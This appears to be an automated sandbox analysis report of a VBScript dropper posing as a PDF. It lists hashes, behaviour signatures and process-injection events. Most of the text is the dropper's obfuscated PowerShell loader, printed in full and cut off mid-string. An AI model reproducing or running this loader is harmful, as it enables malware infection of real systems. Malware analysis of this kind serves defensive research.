2c3d329a94009f4cb36b5c9f4e79caebd9afbbaddfba592bf3847716bafed2bb

General

Target

draft_BL_12092022.pdf.vbs
Size

396KB
MD5

7579a297d1fa9c0c01cd6aac9f914317
SHA1

d50f37645bd0ae8ff35ee933da6e3a7dbbf58d5e
SHA256

2c3d329a94009f4cb36b5c9f4e79caebd9afbbaddfba592bf3847716bafed2bb
SHA512

692f436c18e23aa049ff60d4296d9dd4bdc8c76a4feae438cc05f8bcf91b613a87b8e882c2fed7647656a00eb9f6a3248018123c15cfc5a7e272f060ab9bfc40
SSDEEP

6144:V7d12lB1OzvzbgIxlmQRevRlApKDGjNTH7Wn7LltrUP6gkVk3fhvkQOACCXL:Br2lB1Oz7kIxOvPApwGjNfKrj9OfpLX

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1784 powershell.exe
556 powershell.exe
668 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1784 powershell.exe
Token: SeDebugPrivilege 556 powershell.exe
Token: SeDebugPrivilege 668 powershell.exe

pid	process
1784	powershell.exe
556	powershell.exe
668	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	668	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1684 wrote to memory of 1784	1684	WScript.exe	powershell.exe
PID 1684 wrote to memory of 1784	1684	WScript.exe	powershell.exe
PID 1684 wrote to memory of 1784	1684	WScript.exe	powershell.exe
PID 1784 wrote to memory of 556	1784	powershell.exe	powershell.exe
PID 1784 wrote to memory of 556	1784	powershell.exe	powershell.exe
PID 1784 wrote to memory of 556	1784	powershell.exe	powershell.exe
PID 1784 wrote to memory of 556	1784	powershell.exe	powershell.exe
PID 556 wrote to memory of 668	556	powershell.exe	powershell.exe
PID 556 wrote to memory of 668	556	powershell.exe	powershell.exe
PID 556 wrote to memory of 668	556	powershell.exe	powershell.exe
PID 556 wrote to memory of 668	556	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\draft_BL_12092022.pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kaktusplanter = """UnFHuuUnnBrcUntAmiOcoSunDi ziHPrTEcBCr Af{Ri Co Bi Sl DapSuaStrInaGumPo(Sp[AdSTrtIlrPoiWinCogSl]Fo`$FrHPaSId)Al;Fa Oc Br Su Al`$KrBWiyUntPeeStsDi Al=Ne UnNOveOpwBe-PeOInbCijPreNecFotEk MobReybathaeRa[ra]Da Fo(Xe`$FrHfoSGu.BrLAfeDenFagDitUnhVe Bo/In An2Re)Ge;Ng as Kv Te UnFNooForUn(De`$CiiAr=Se0Si;Ce Om`$TaiTe Se-SelBrtPr ho`$DiHWeSTr.BrLBjeTenOvgFrtDrhDe;Kr Po`$drica+Sy=Bi2Ba)Ph{Hk He Ji Mi Fo Di Av Fo Bo`$PaBRdyCotQueBrsCe[To`$SaiRu/Mi2Be]Pa cr=Cu Ov[PacKuoKanatvMoeParSmtSc]Bl:En:NoTEioHeBEfySttPreBa(Ps`$UnHLnSGa.CoSSkuPabVasMltRerPliKanSegSh(cr`$FriXy,Pi My2Sk)Be,Ud Na1Hy6To)Ad;Em Si Cu`$icBUsyUdtCoeBesIl[ra`$KriSe/Co2pr]Da Pi=re Va(ka`$BuBReyExtAgeFasFr[Fe`$DeiSn/Ap2Sw]Du re-HebSnxdioDerIn Da1Cr5Ty7Kn)Si;Ma Kr da Fj Su}Ne Sp[FiSEptSqrOuiPrnergGe]Un[coSAayCosExtRoeSomZy.NoTAneWhxbrtLu.FeEAlnRecseoVidTiiUnnBlgFi]Di:Bo:ChASaSkoCAnILiIMo.KoGHueHotDiSImtEdrDeilynPogHe(af`$GebJayArtRaeFosFo)Sk;Uo}Ov`$BrNFooSjrNomUdacalPsiMisFrfArbFrrTe0Ar=VkHTeTCiBSt Va'PuCToEFiEBo4PiEDiEkaEBe9SuFRd8hjFFl0IgBLa3AcFIn9EkFBa1BlFSh1Ne'Li;Ma`$FoNCaoTorUbmBeaEnlFoiBrsanfDibinrst1Fi=afHEkTFoBfa Re'InDDd0SeFEy4TeFSaEwaEPrFGiFAn2GrEFoELuFCa2OpFDiBEgEIv9NuBMe3HiCDaAToFDh4StFWr3AsAAuEnoAcaFouBKi3ReCJu8HuFVi3CoEGaEOpFSkCOvFSeBSkFBy8CeDBr3CaFfrCHyEUn9PaFki4MyEFoBExFKu8grDEp0faFTo8TaEOl9OpFAn5OmFPe2PaFRe9SeEBeEBr'Zi;Ph`$feNUaoLarUnmDeaSnlSoiSpsStfClbSlrPr2St=InHToTReBli th'LeDWhAUdFRa8BiEFo9GlCGiDFlEEkFBuFRe2SuFFlEHeDKiCMiFUv9BlFOb9ChEUnFYdFTi8ulEveEMeEAbESq'Sh;To`$FoNRooUnrkamGraUdlNuiLisLafAfbharVa3Ma=ToHErTGtBTr Ku'BaCEsELyETa4HuEBrEReEAt9EnFel8BuFLo0SoBWa3PrCAiFSnEFi8naFFe3InEHe9woFSt4FjFAm0SaFSt8SpBMa3epDci4SuFGe3MiETv9skFCo8BlEThFUnFun2AdEPsDTiCOpEEnFIm8LvEOmFEpEBiBvaFGa4SgFDeELnFFr8AfEPrESpBun3knDGy5EiFDyCPrFDi3DeFVa9ToFDe1SeFch8buCReFFlFgu8FiFWaBNu'Um;Ra`$DoNAmoCerstmDiaHelDiiPrsCyfEfbDyrca4Ju=CoHFlTOfBTr An'NyECrEShEBr9DiEBaFPhFaf4frFZe3VrFTeAAf'am;Pr`$klNTioKirKamDiaUnlOriResNofFabTurNa5Hi=SkHtrTVaBDe Mi'PrDMeASpFBe8TrEMo9feDTo0EvFDe2BaFFj9GeEFo8ToFCa1LeFkb8SeDLa5meFNoCPoFAp3ArFDe9SiFRe1KnFBi8Vi'Fr;Pr`$OcNTeoSkrHammiaUnlAliErsBlfInbEmrgi6Az=CrHMaTCrBBl Fo'BuCSeFFiCIn9CoCBoEAcECoDAnFMo8ReFAmEskFSo4OvFKoCTaFAd1GeDhe3PrFFiCBaFRa0SuFAf8suBQu1PlBUnDOmDTr5piFPl4UbFUn9CaFHe8DaDKvFCuEAs4foCElEcrFIn4reFUnACrBBy1baBInDAnChoDChEIn8guFBiFSaFTi1KoFMe4RaFTyEBa'Po;Aa`$PrNLjoRerHamDraSvlPoiHusPrfSubStrTr7Ov=HaHTaTFlBRe Ra'MeCMeFDrEDu8akFHe3raEHa9HuFBa4SvFSl0toFHo8BlBBa1ZiBKoDSaDst0TiFFlCDoFOd3KrFKoCBeFUnAUnFun8TeFHe9Pe'so;Bi`$FuNCaoEbrPamKoaTilDaiMesBafBrbGerOp8Fe=BlHStTIbBGo Ue'ImCUtFSuFHu8PoFSuBFiFAu1OpFJu8DiFTrEUdESa9EnFWo8QuFHo9OrDCo9GeFCa8FlFSl1DoFHy8EnFReAHuFQuCPrETr9soFLa8sv'Co;pr`$GeNLsoMorUdmFraHulUliLasTefSkbUnrco9Fo=TaHAsTOfBDo Sp'MaDPi4OvFBr3AfDFo0ToFFr8MiFUd0MoFEx2trESkFMaECo4spDpr0KrFho2FoFKa9ReESc8eqFAn1PoFAs8In'Kn;Hu`$LaBOiiBusTrtliamenafdShsFrvMirRigReeElnEa0Ba=CaHBrTTvBCy Bi'AtDSe0FoENe4JaDBa9KnFKo8AbFSu1TiFSt8ruFDuACaFDiCskERa9AcFMe8AkCCe9PoEMi4KoEJoDGlFVl8Sp'Br;Be`$GaBTiiunsFdtAkaSanPidkrsAnvTerKlgKaeScnUg1Hi=BoHsiTWiBSl Ep'HeDAkEUnFFe1AlFUeCNaEEgEinEDeEReBTo1ExBKoDReCCyDRaETr8RiFTeFJaFIn1PrFNo4BaFDyEBrBCr1LeBApDFoCDeEGsFSl8MoFSkCHaFBi1ShFAf8FrFKa9BlBSa1VeBpoDDeDAzCRuFEr3AlEImErgFEm4GiDPeEBdFBi1TrFprCAnESlEMoESuEJuBal1DuBsaDHeDSnCHaERo8BrEMa9CoFMa2UnDPrEUnFSt1ClFUnCFoEDiELrENoEIn'Ch;En`$DaBStiGasTatEkaFinHedNosdivVorVegNeeGrnCe2Ap=DyHPaTSaBBl An'HaDOc4CuFVa3CoEThBDoFTr2BeFIt6BmFSa8Uf'Ho;De`$GiBReihisRitHaaHenCodSesCovRirPhgAfeUnnce3Br=VaHTrTTrBEn um'ThCQuDBeEOm8PoFTrFBuFAl1PeFUn4TaFSaEVaBBe1taBGlDreDJo5ReFHa4RiFPr9AfFRe8HeDSpFVoERe4HeCOrEArFSt4UnFKlALaBSk1TeBRaDBuDIn3NaFNi8LeEDiADoCAcELaFBr1KaFfa2isESe9SuBBe1EsBMaDkoCFoBEfFNe4StEKaFMoETe9ToEBi8UdFFoCJeFHa1Sa'Ab;Ga`$FoBJuiSusEmtReaMindydCasBrvBorUngCieUfnAn4Vi=NoHNoTLeBMe Pe'OvCMiBAdFSc4UdEReFApENo9TaEUn8BeFSkCFoFHu1AnDIdCBeFCa1myFPe1RaFAl2GrFYnEIn'St;Pl`$SiBMoiHesBetUnaFunEpdunsafvLnrHogDaeHanPh5Am=GuHSaTStBTu Mu'LeFVe3MeEIn9GaFTr9PrFDy1AaFba1Na'De;Re`$ToBEniBesDetAvaBanStdMesGrvHorEigBeeNunUn6ek=PaHKrTUaBWe Ge'IgDGr3StEDo9GyCViDPeECuFHeFRe2JaEMi9CeFvi8SvFArEliESu9CoCbiBReFCu4SoEhjFAfETr9ReESk8HoFUnCunFMo1HaDda0liFSy8CoFBa0FiFAg2AgEemFSeEPr4Ad'Pi;Ov`$FlBReicosTatSkaFrnStdPosFevLarPagBrefanPr7Lo=BaHViTHoBIn Sa'BuDUn4soDOv8GeCKu5Te'Re;We`$UnBEaiClsAntPlaBanundStsaivStrSigRueChnRa8In=TuHFlTbeBAg An'LaCDe1Ox'St;maSFueXatSk-ReASklBeiSkaOpsRy Ne-LsnWaaTomTreAf DiBIniMisBrtPoaMenTodDesDevNarTrgvieAbnco9Si ku-FivGnadolDiuTueFe Ny`$SlBAsiBlsVetHoaHenUddResUfvFirOugMeeInnBr7Bi;AafNruSenRecTatFeigeoRinBr UdfIskhopSo Tj{CoPAdaUnrSpaGemBe Vk(St`$FevVe_SnmGr,Me St`$Tevan_DdpTo)Ol Ac Bo Ga Su Af;Re`$AkTKarKaaHufTriAlklimOdibrnBeiKesVatPieTartiiUnuDrmVisEl0Un Po=NeHSmTUrBKi sk'UsBAd9ScEUnBSaERo8TeFTe3DaFbr0DeBStDBaAWi0DdBMiDNoBdi5PaCEu6AaDSeCStEEnDPaEDoDleDMa9VeFKl2SyFVa0GiFRuCspFBl4SaFgr3LaCAl0RoARe7RaASk7BeDIlEUsEfi8SuEMaFLoEcrFExFOb8TuFMa3HuEDe9MeDun9BrFUl2PaFOl0InFKrCOoFMi4SdFBu3BrBRo3FoDDrASuFEm8BoEIn9JeDAfCinEMaESqESjEThFJu8FaFPo0InFUnFFjFCe1CiFUn4SuFBe8OvEViESuBEv5MaBGe4UnBMuDFaEOm1InBHyDLoCGrAMuFAo5MiFSi8MaESoFIlFPo8TeBEk0ReDSt2taFDeFPrFOv7ReFGl8UnFLuEHaEan9RdBAmDStESt6HuBStDCoBMi9AgCBi2tyBWo3TvDBoABaFFa1BiFPe2StFRaFMaFPrCSuFNe1SuDReCTeEAnEUnEEqEUdFTr8PoFSa0CaFNoFFeFSk1JuEIn4SpDSjEHoFnaCDoFFlEPeFSe5hiFFi8CiBSnDflBDi0HyDLaCHvFBe3TiFfi9HyBBiDSaBDi9HjCPr2LeBTe3SeDka1brFSt2ShFUnEflFCrCSdESk9SiFBl4StFRo2reFSo3TaBPa3InCRuEseEChDPeFPy1UnFLu4OvETa9TjBFy5DeBNi9PsDDoFSyFMi4FuEBeEHyESe9FlFFoCFlFme3kaFsn9ReELaEveEStBKaEFeFkoFPoADiFCh8CoFKa3MiAPr5NeBPr4AnCBe6SkBYe0OvAPoCStCma0SkBLa3noDOp8BoEWaCInEbe8SkFTeCLaFKa1OvERiEAlBPr5SoBMi9ExDKr3FlFCo2ekEseFViFUd0EiFVaCArFIs1KaFMe4AlETaESiFAlBFnFReFPrEByFHjAFeDceBCi4PoBQuDStEac0SuBVa4spBTr3DaDShAAfFAy8NyEve9RiCGr9VeESt4ByEAlDDeFPo8HoBSe5drBPr9CoDNo3LaFSo2GaEfoFflFBe0YeFbkCSvFBa1SpFUt4UnEMoESyFTaBTrFSaFBrERaFReACoCBeBCu4jo'Ho;IrBPoiWisTrtDaaDinPidChsCovBarnogGreBenTy9Ha Du`$SkTBorTraRafCiiTokLomAdiInnCoiRisUntPaeUnrNoiUnuTumPesYd0Na;sa`$OmTStrTiaSefAdiWhkgamtiiTinNoiPesHntPreJorLaiCyuFomFisUn5Ti Tr=Un BaHLiTRyBIn Lo'UsBIn9flEudBCoFReCStEKiFStCPl2PoFChAsnEFiDHoFUdCChBPrDHuASe0UnBReDFoBHe9SmEWeBNoEUn8AtFMo3CoFUn0caBTi3tjDDoALiFAg8MeEOv9DoDfo0NeFLo8ReEAr9MaFEn5RaFTr2AfFRe9ErBSk5TkBMa9DrDGr3MaFIn2AfEIsFdiFNr0InFFuCDiFAn1SqFNa4drEUnEAeFBeBBeFOvFSvEToFfiAIrFBrBUn1HoBSaDObCKi6AmCFi9spEMa4AdEBrDReFCa8FlCsu6KiCKu0LoCKo0SiBEmDAlDKrDOvBPo5PhBSk9PrDDr3ThFTj2BiEChFadFUn0ryFOmCHaFIn1SoFSc4PrEBoEKuFDrBNoFNiFOvEFiFMiAorEBeBFo1FoBVeDchBDr9GaDSt3OvFDi2SuEAnFMaFLy0UnFFoCBoFsi1RiFSm4UnEDyEreFFoBSoFaxFAgEPoFudAte9NoBRe4OvBLi4Ra'Sh;WoBHiiKusgutBeaNinEldTisObvKerRegGleAtnFo9st Bi`$AnTCarBeaLefSpiMokEfmAuiarnBuiBasMatkleMurAciSvuPrmFesDo5Pa;Si`$boTAcrMoaEnfPaiCakMomMiiMunLfiGosPatGaegerTriVauStmBrsFe1Be Is=De fuHdrTAbBIn pr'EgEstFAfFnl8HoElo9HoESi8MaEaaFJoFNo3OpBTrDPeBCo9ClEthBAsFSaCStETiFCtCLa2BeFDoARuEUnDVeFSaCEsBwa3SeDAf4PiFLa3ScEToBBlFDi2FoFBe6SkFSm8CrBAn5AsBFl9SyFRe3GaETa8ArFGa1HeFUn1SpBNo1BoBRuDWiDCaDOpBMo5FrCFl6CaCMeEAaELe4CyEfaEGlEFo9ReFSp8FrFBa0AnBFr3ReCkrFElEOm8ThFDa3WaEUr9SkFVa4StFCu0PeFTe8TeBId3FaDDi4CoFbr3beESp9PaFRe8PrEFoFOvFMi2FlEEnDHeCDoEHoFCo8anEFoFGrEDiBCoFHo4krFPoEQuFDe8DeEBoEArBYa3StDHa5KrFApCWaFFa3SsFPe9GhFWe1DeFPo8SoCUnFNeFGo8BaFDiBExCPi0OuBSy5MaDNa3foFDa8HaEVeAOpBTr0SeDTo2AnFJoFanFOu7ldFAf8InFLoEUoEBi9WhBBiDdaCPlECoELa4OuEDaEUaEUn9TeFRi8SaFGr0AuBUt3DoCStFInEBl8EnFMe3PhEtr9FrFFo4ReFCh0VrFMa8EnBMi3CoDBo4BaFBl3MaEDa9AvFOb8TeEMeFLuFFr2UnEUnDpaCIsENaFPn8WhECuFSiEBvBesFAb4OvFClEAeFKo8PaEVeEBrBRa3TaDBo5BoFFoCKeFUk3AsFGr9rhFla1CoFSt8FiCSnFPrFVi8GrFCiBBrBKo5BeBOd5BrDSe3KnFTr8StEKrADeBov0EnDGe2FiFHaFMoFSk7EpFli8HaFReEArEpa9FoBHeDBlDKl4MeFOp3tfEov9PlCNaDAnEMa9SuEVeFAdBBe4veBKo1HaBNaDEkBGa5MaBKo9KrEGrBPhEPo8SpFSi3UnFun0OvBFu3PsDTaADeFSp8PsEIn9MiDIn0ReFSe8ChEAu9FoFTa5CaFDj2FaFEc9AnBLn5HoBGe9OvDmo3AfFIn2coEJaFEcFAn0CoFSmCNkFSe1GoFSe4AsEDyEOpFRaBFaFGlFGaENoFBrALi8RuBPe4paBFu4AfBPi3KhDMe4ReFMa3FoEInBCiFFo2UnFNi6jaFLa8NoBMa5InBEk9soFPo3urEEx8ReFWa1ExFDi1EvBFa1PoBDiDSeDRoDBaBWh5NoBRy9UrEStBAdCPe2SkFRi0UnBIm4DiBKa4CaBAe4AnBOr4HeBJv1MeBAtDPsBTu9BdEAlBBaCdi2asEPrDFeBYa4TyBRe4Pa'St;AgBKniObsUdtLaaKonAcdUisTavSwrCygReeplnSp9Ie Me`$DiTBerFraFifReiDokJomRaiBonEmiJysHotReeOvrcoiKauPamTosEs1Se;Af}VofSnuCanAncNatBeiRaoHenov GeGVoDReTKo Di{BrPoraInrEsaNomsu Fa(Ud[AaPJaaLarPsaMamSteSytKeePerWe(GePthoUnsSpiAntDuiGroStnUd Ud=Bo Sh0Ha,Bu EnMSoaKenNedPaaTotHaoEnrUnySp Bl=Pr No`$MiTMarFruAreFo)Kn]Gi Po[PoTsmyBepDieUn[St]Ko]Re Fo`$InvClaFrrPe_XipRaaOtrJaaovmDueFetSkeNorDisEn,st[UvPGuaTrrSaaInmRaeThtIneDirEl(KrPTaoAdsgaiZatVaiCrohjnUn ad=Pl Ud1Tw)Fy]Da St[OvTDeyHapFreMa]Ku Pu`$KovMerAutpe Ph=Ec Ej[KeVLgomiiGrdFr]di)No;Ko`$foTVorQuaHofExiUnkFrmCaiEknAlimosBdtSleUdrIniJeuFomHjsLs2Wi La=No UnHHaTVeBau Al'clBBr9InCDeBNoCFo9DaDSuFInBanDTiAAp0ChBBrDKaCTa6DiDTuCCrEVaDelEUnDOpDal9slFOp2EwFLa0DiFReCApFSo4suFSe3tuCTa0MuAwe7GuAUk7unDViEAfESc8TrEAdFFoEKrFEnFLa8MuFOp3YdETh9ViDEc9PaFEn2BaFSt0OvFSeCExFUf4DoFry3uoBHo3JeDBe9StFAn8OpFkaBorFPh4ChFTo3FiFJo8FnDMa9KvEVe4TaFSu3YiFGsCSaFHe0AmFDi4LuFReEKaDPeCPrEStEReESaEHyFAl8boFOk0SkFseFNaFdi1UdELe4CaBUd5LaBVi5RaDRa3kaFMi8DiEPrADiBHi0FoDAf2SyFInFTrFTa7WaFMe8VaFFkETrEle9KaBudDatCCoEPrEFo4TeEPlEIbEDr9TaFRo8KiFPs0BuBTi3NoCInFCsFPr8TeFJeBPrFSk1paFRe8EfFNoETeEDr9PsFUn4AaFPa2vaFPa3DuBKo3ArDAuCAfELiEMeEUnEBoFRu8ArFHi0GiFQuFNoFLe1reEFe4ThDSe3SaFTeCTiFPa0LiFOv8MyBTa5LaBNa9ToDFo3PaFFi2InEsaFFoFIt0UnFIrCCnFVu1LaFCe4soEImEflFBrBhoFprFChESpFPyAKl5AfBFr4PaBPs4BeBen1WiBblDTrCCo6BoCGaEPrEHa4HyEBoEReEGi9UnFKe8WaFIn0InBCh3ReCSaFarFMi8TrFStBGuFEu1IrFAs8AdFFdEDiEEs9LyFIn4sjFKa2XyFFr3DoBBe3SjDMi8VeFBr0foFHa4KoEMy9TjBHy3CoDPaCCeEstERoEStEknFUn8ToFRe0puFGlFHyFDi1UoESl4PrDWiFUpETo8DiFDo4MaFFa1BrFMi9ScFAr8WoEGoFSkDgeCTrFseETrFErEBoFSe8BoEAnEFeEKlEBoCQu0NoASc7DiAOp7StCImFPoEHo8CoFSu3TrBAt4HoBRa3PoDHa9noFPr8SeFStBCoFka4DdFPr3SkFFo8RoDTv9VeEGo4esFPo3RaFLaCByFOp0RaFMu4IvFStEEgDFo0InFSe2RiFTr9FuERa8VaFBe1GrFre8MoBHy5PiBCo9ReDHu3HeFSl2DiEBeFSkFRa0FoFAnCWoFDe1SuFTr4SoEpsEOpFUoBInFHvFFaEWhFLlAUn4NoBKr1ReBSlDVaBSa9KlFmoBStFOiCFoFSm1goEDaEDeFUn8CoBTr4EmBRo3StDEn9ViFFl8epFEfBSvFBe4TeFWi3ExFCh8ClCEg9CaERu4HaEBiDShFBl8SkBWr5HoBKo9SeDKuFUnFRy4ArESuENoEPo9PoFShCHoFFi3LeFCe9AgEflEIcESlBGrEMiFGeFHoAUoFLa8SyFMi3AnACaDAmBCe1TrBInDPoBSm9ThDRoFNoFSm4ApEOcEPrEPr9LaFArCAfFTr3LeFSi9HoEbeEPaEHaBWaEInFDeFPeAAbFJu8biFCo3faAGoCunBUd1TrBTrDImCUn6MoCHiELaEBe4VeEUrECrEtr9BoFVr8TeFCr0DeBFi3AcDGa0BeELe8TeFNo1VeESp9FiFSc4TiFKvEEpFVeCStEArEUnEOv9NaDKi9SpFUn8CoFFa1WeFBo8EnFChAPhFHoCHyECe9StFUn8BuCCh0SkBAn4He'ne;spBBaicosCotAnaOvnkodStsGuvElrAngKaeTrnAr9om En`$AnTDirHvaDrfReiEtkAymTriLgnFlidisAftEkeMarBiiMiuInmMasOf2Re;Su`$KoTVirDraInfUriHokBomMoiAgnpriVosCytMiePhrAniSnuagmDesHa3Hy Sy=To UnHOdTTrBSm Fl'LaBKu9StCAnBThCSt9GeDVeFplBDe3TrDTi9EnFRo8MaFScBMeFBl4DrFSh3BeFNi8KoDTaEFlFFl2FiFFo3udEStEWiEst9ShEFaFViEPl8ZoFLeEMaESo9UtFLo2TiEAnFLiBRi5MaBCa9PuDJv3PeFHy2ReEInFGeFIn0SkFSkCWhFHy1ShFHa4AnEUnESoFUnBUdFKaFUnESaFWhAMeBPeBUn1SoBInDInCEk6LiCBhEPeERe4ScETaEchEMe9RyFBi8CaFUn0TrBPr3VaCInFReFNa8MaFCoBDeFAr1CyFFi8MaFchESiEbe9UnFGa4ArFBe2PrFOp3OpBUd3MeDRiEFaFKlCCrFSk1ClFUn1neFTa4MiFko3ArFMiACoDBuEGeFSu2HoFBr3TeECoBTeFSo8EnFPr3AdEAn9stFIm4DaFco2TiFEr3RoEFeETrCSa0SyAIn7orAba7AmCChEUsEFo9FoFHeCSiFHr3ReFCo9OxFKaCmoEKiFRoFha9UnBMa1UfBJeDUfBCa9MoEViBAmFMeCpeEfnFRoCDe2FoEAnDBuFSeCKnEjuFFoFUnCMaFGg0GyFOv8PhEun9afFto8GaEKeFDaEslEBaBCh4UdBNi3HjCIrEvrFPr8BeEUp9DrDHi4CaFDu0UnESaDSoFTo1CsFAk8PeFna0FuFAf8UdFUn3stESa9unFUgCCoEAf9trFKr4DeFPr2ReFHu3AxDVaBHaFSj1AnFHeCPaFCoAPaEInEenBLy5YiBPe9UnDAk3OmFSw2CoEInFUnFfl0HuFCeCepFDe1EnFFa4SlESiEHyFDeBScFNoFarEMaFStAInAReBSi4De'Ps;LuBPlitosTitUnaCrnPrdFosdjvHerBagBaeStnAf9Sa Fo`$HoTHirSiaLofauiBrkWhmtoiTonTaiMisPrtRueMgrThiThuOvmUnsEk3Un;an`$AmTSkrEgaLafRuiUnkGrmAliInnKliKasBatUaeDorFiiAduNymFrsbr4Si Ud=Pr WeHSpTBoBdo Lu'VoBar9ShCJoBSuCAd9AmDSkFSeBHs3SaDpo9smFCa8PrFFaBdiFTe4MaFPr3NeFkn8ChDFi0FeFno8PoEFr9EsFAn5MaFPl2KeFAp9UnBUn5HyBSe9taDTrFOuFDe4FoEHjEAuEKv9GeFTaCHeFBa3PeFSh9KhEUbEPoEDiBhjELeFBrFMuAKeFAn8ruFTh3SnASpFBuBop1MeBIrDDeBFo9ChDMuFFaFPl4DaEPrEaiESa9InFSuCFrFNo3KnFNu9UdECoEFdEOcBmnEapFVrFBlAsoFRe8BeFUn3SuALsEFoBSo1QuBPrDArBSe9CaELaBHyESeFKaEPo9ArBpr1GrBUpDGaBSk9AmESlBdiFBaCAfEAcFRuCvr2TaEDyDNoFSeCUnEScFDeFHoCreFKe0HeFDe8AfEFr9StFve8GoEDiFAnEAlESaBSu4KiBLa3SpCBiEApFPo8FaESh9AmDTi4FoFVi0MuEMuDSoFIm1PhFSo8PrFGe0ReFMu8GoFAa3NaEBu9UnFtiCAbEBr9CoFBa4BoFEp2CaFAr3GaDFoBToFKi1ObFPrCAfFGeAVeEDeEBrBKo5DaBRh9EkDTy3OvFSt2DyEFoFSkFCh0AgFDaCHaFLu1ViFKo4InEMoEAkFCiBPaFInFIlEPiFDaAEsANuBIn4Ch'De;GrBUniKlsTrtUnaRenDodOrsAnvStrPhgpreLunAp9Ma Fe`$MaTRuranaRifPeiFokaumUniRenMeiDesTytOveWirUniDeuAfmTusPe4St;Dy`$SpTKorhuaPuffrirakremTaiPonRaiMasFotSaeAxrLiiHyuApmMasOt5Au Pr=ma ExHMaTFoBSa To'UnEBoFEgFEl8ChERe9SeEHe8SuEFlFnoFEm3VeBIsDBrBhe9GnCMaBAtCSa9ElDMuFScBMa3PsDKoEDaEUnFReFKl8GoFBrCreESp9DaFTa8VaCJu9UnENa4TeESvDPrFSt8LiBDu5TaBan4In'Su;HaBBiiOuspatauaPanLwdAlsravPerBrgTueLenHi9Su Sk`$AtTHtrYdaPifToiBukKamPriOvnLuiKosErtReeurrKniCauTamQusCo5Sa Ad Wi un;Mi}Ed`$FikRekSv Ud=Tj CoHCoTBoBKi Pl'EnFMa6BeFBl8FeEElFWaFHm3HaFCi8TiFBy1GuAFlEOmANiFFr'Tv;Ve`$BeTnarsmaWhfKaiErkAfmPtiMinSeiMasRetSueFlrBiiUruTomLosMi6Oc Af=Kb InHFoTAdBFo De'TiBEs9OvEAlBspFsvCtaEriFOxCOv2EuEArBMaFFlCmiBEnDJaABl0haBSoDFiCCr6frCSpEBrEAt4UnEInEUnECe9DiFBa8PrFFa0EkBEn3ByCAdFUnEPy8PhFyn3TeESt9MoFAr4OmFFi0reFLa8PrBBl3CoDEa4LnFBo3VaEBe9BeFFl8UnEWoFHjFNo2stEGuDUnCSuEGeFPr8DiESaFPoETaBMiFve4UdFBeEanFRg8UnETaENaBUk3SeDTi0LaFTaCEnEBlFSiEmeEReFKa5BiFCaCSkFMo1saCTo0GrAEn7BlACu7PrDNoAFoFRe8alEat9KoDEd9WhFNo8plFRe1AdFUn8TrFToAReFMaCBaEFe9ElFLi8ArDFrBEmFCa2AlEDoFBrDDeBBaECl8PlFNo3LiFCoEHaESt9LaFLo4MoFbo2CoFHi3TaCWeDOfFSl2UdFDi4ExFBl3KiEBa9GeFRe8PeEKoFPjBEr5kbBFa5EnFOvBReFsi6BiEBkDChBCaDdoBOp9AlFEp6DiFRe6JoBPeDmeBSj9CaDTeFSaFZo4KaEBrEFeECo9StFBeCGrFEt3HoFCa9BaEGaEGrEGeBScEDeFStFBaAFeFst8DaFBa3MoAKr9PeBCa4GaBkl1JoBDiDDeBTi5AfDGaAAdDTr9drCTh9HeBScDDeDOpDNoBKr5CoCTi6ShDFo4UdFBo3UnEBr9TrCcoDNoEAl9flEVeFSkCSk0auBEn1PhBMdDCrCHo6SkCBu8BeDGr4BeFBe3VaEke9prAUrESuANoFReCta0BiBSk1SvBSnDFlCRu6raCBl8DiDAf4UdFEn3AsEFo9PrASoEAlAOvFSeCPy0BuBba1RuBVrDLaCSm6FeCIn8CoDHi4EaFPr3CeELe9CoAMoEGrAInFMaCFl0FoBTo4PrBKaDSlBCa5SuCbr6RoDPa4HuFBg3MeESk9TrCPaDHoEMi9DuEUnFAaCOu0SaBAl4SlBHy4daBOn4Ra'Al;ThBiniKlsDitSaaSenMadAnsSkvInrKogbiePonUn9Sk Ca`$BoTUkrAkaPofRaiNokCimNoiChnSkiMisSktPieSprStimouInmSysEk6Al;De`$mevSaaChrAs_fonHutOv An=In TyfSukSepRe Fr`$AfBOpisusFotReaChnFedTasexvSmrAngTreexnPh5Tr Al`$EsBBaiUgsEltMuaCrnLidStsRavGrrLigSeeJunSe6Tr;Re`$SaTTarPaaTrfUpiAbkScmaniJenApiLnsAltSkeMarAmiBauElmLisba7Ra Lu=da StHKoTFrBGa Se'VaBRy9KbCSvALsFCa4VeFRa1LeFAd9JeFBo1EkERe4TiAfjECoBDeDBuAPl0UrBLeDElBCo9AdEPaBBeFdaCSaEJoFKaCIn2FoEBuBLiFHyCDrBKl3VaDVi4hyFEn3CaEVoBKaFUd2BgFUd6MoFVa8AwBKn5DrCKa6StDBi4OuFRe3AsESu9BoCClDIpECo9AfEKoFFaCEf0grADu7ViABu7SeCFl7ImFCo8InEBlFDrFBj2haBPh1StBEmDGeALoESpABeBLyADk4PlBco1LrBTeDAvAKoDScEKo5HyAAnESoASpDBiAPaDMoAFoDBaBLi1PrBfeDCuABuDDaEKo5ImACu9AfAHeDHoBPa4pu'Ad;SnBVriMasHutBeaennKndFosUnvTurVigteevanLv9Re Ba`$SiTSwrInacafSciUdkunmVoiPrnNuiPosAftTaeCerFoiSyuHcmOvsSp7Ma;Se`$FoTInrSlaRefPaiKokSjmcoiinnDeiAbsSotOyeAnrPeiMeuUnmFlste8Sk Mo=Ac InHBoTeuBEf 